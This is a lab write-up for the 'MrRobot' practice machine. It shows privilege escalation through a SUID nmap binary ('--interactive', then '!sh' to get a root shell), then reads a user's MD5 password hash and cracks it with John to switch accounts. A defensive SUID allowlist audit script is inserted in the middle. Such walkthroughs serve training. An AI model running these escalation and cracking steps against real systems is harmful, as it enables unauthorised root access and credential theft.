MrRobot
Privilege Escalation
- We can catch the Reverse Shell from WordPress using netcat
daemon@linux ~$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
- The /usr/local/bin/nmap Binary has the SUID Bit Set.
daemon@linux ~$ find / -type f -perm -04000 -ls 2>/dev/null
...
34835 496 -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
...
- Using NMAP to Escalate Privileges.
daemon@linux ~$ /usr/local/bin/nmap --interactive
nmap> !sh
daemon@linux ~$ id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
daemon@linux ~$ whoami
root
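The SUID finding above is the kind of drift a periodic allowlist audit catches. Added example, not part of the original write-up: it lists SUID files under a directory, reports any path missing from an allowlist, and clears the bit on those. The function names, the allowlist file and the demo tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: SUID allowlist audit. All paths in demo() are constructed.

# list_suid DIR: every regular file under DIR with the SUID bit set, sorted.
# -perm -4000 is the same test as the find command used in the write-up.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# audit_suid DIR ALLOWLIST: print SUID files whose full path is not a line
# in ALLOWLIST (one absolute path per line, matched as fixed whole lines).
# Returns 0 if something unexpected was printed, 1 if the tree is clean.
audit_suid() {
    list_suid "$1" | grep -Fxv -f "$2"
}

# strip_unexpected DIR ALLOWLIST: clear the SUID bit on every unexpected file.
strip_unexpected() {
    audit_suid "$1" "$2" | while IFS= read -r path; do
        chmod u-s -- "$path" && printf 'cleared SUID: %s\n' "$path"
    done
}

# Demo on a constructed tree of empty files, so it runs without root.
demo() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/usr/bin" "$root/usr/local/bin"
    : > "$root/usr/bin/passwd"
    : > "$root/usr/local/bin/nmap"
    chmod 4755 "$root/usr/bin/passwd" "$root/usr/local/bin/nmap"
    # Only passwd is expected to be SUID in this constructed allowlist.
    printf '%s\n' "$root/usr/bin/passwd" > "$root/allow.txt"
    echo "unexpected SUID files:"
    audit_suid "$root" "$root/allow.txt"
    strip_unexpected "$root" "$root/allow.txt"
    rm -rf "$root"
}

demo
```

On a real host the allowlist would be built from the package manager's file list, and the audit run against / as root.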
OTHER [ROBOT MD5 HASH]
- In the Home Directory of the User robot there is an MD5 HASH.
daemon@linux ~$ ls -l /home/robot/
...
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
...
daemon@linux ~$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
JOHN
- We can Brute-Force the HASH using John
- Password: abcdefghijklmnopqrstuvwxyz
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
abcdefghijklmnopqrstuvwxyz (?)
Switching User
- After Cracking the HASH we can change our User to Robot
- Username - Password: robot:abcdefghijklmnopqrstuvwxyz
robot@linux ~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)